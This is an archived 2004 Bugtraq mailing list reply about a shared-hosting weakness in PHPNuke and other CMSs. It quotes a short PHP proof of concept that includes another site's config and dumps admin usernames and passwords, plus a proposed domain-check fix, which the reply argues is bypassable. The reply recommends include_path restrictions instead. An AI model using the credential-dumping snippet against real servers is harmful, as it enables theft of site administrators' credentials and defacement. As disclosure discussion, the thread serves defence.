lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 01 Jun 2004 11:14:50 +0200
From: Peter Hagstrøm <ph@...dcode.dk>
To: bugtraq@...urityfocus.com
Subject: Re: Possible bug in PHPNuke and other CMS


<snip>
> <?php
> require_once ("/location_of_victim's_PHPNuke/mainfile.php");
> $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
> while($record = $db->sql_fetchrow($sql))
> ~  echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
> unset($sql);
> ?>
> 
> Queries are executed normally because config.php (which is included by
> mainfile.php) provides the information in order to connect to the chosen
> database. This is a very easy way to deface PHPNuke-based websites or
> adding and removing users, and so on.
> 
> This "homemade patch" goes in config.php, just below connection
> variables. It checks domain name provided by web server with the one
> provided by the user and grants execution of SQL queries only if domain
> names match. Here is the code:
> 
> $domainname = "www.example.com";
> if ($_SERVER['SERVER_NAME'] != $domainname ) {
> ~  echo "Access denied";
> ~  die();
> }
> 
> This vulnerability isn't only for PHPNuke, but also for every CMS that
> doesn't check domain names.
> 
> Greetings,
> 
> 					Luca Falavigna

Actually this "vulnerability" exist for all server side code. You could
even step up one level and have the php code printed out, getting the
passwords/usernames for the passwords in plain text for a more direct
usage. Two points I would like to make:

1. I would not call this a vulnerability. If you CAN do this for a
system, I would call it a configuration problem. PHP should be limited
to only accept allowed include directories by use of the include_path
option. This can be setup on a virtual domain basis, and thereby
preventing any other virtual domains from doing any such evil.

2. Even if this was a bug, the fix you propose would not really work. In
your code, you could simply add a $_SESSION['SERVER_NAME'] =
"some_other_domain_name"; prior to the include statement, and the code
would be still be fooled.

However, this is a point that website admins should be attentive to when
setting up multiple domain servers.

/Peter Hagstrøm

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ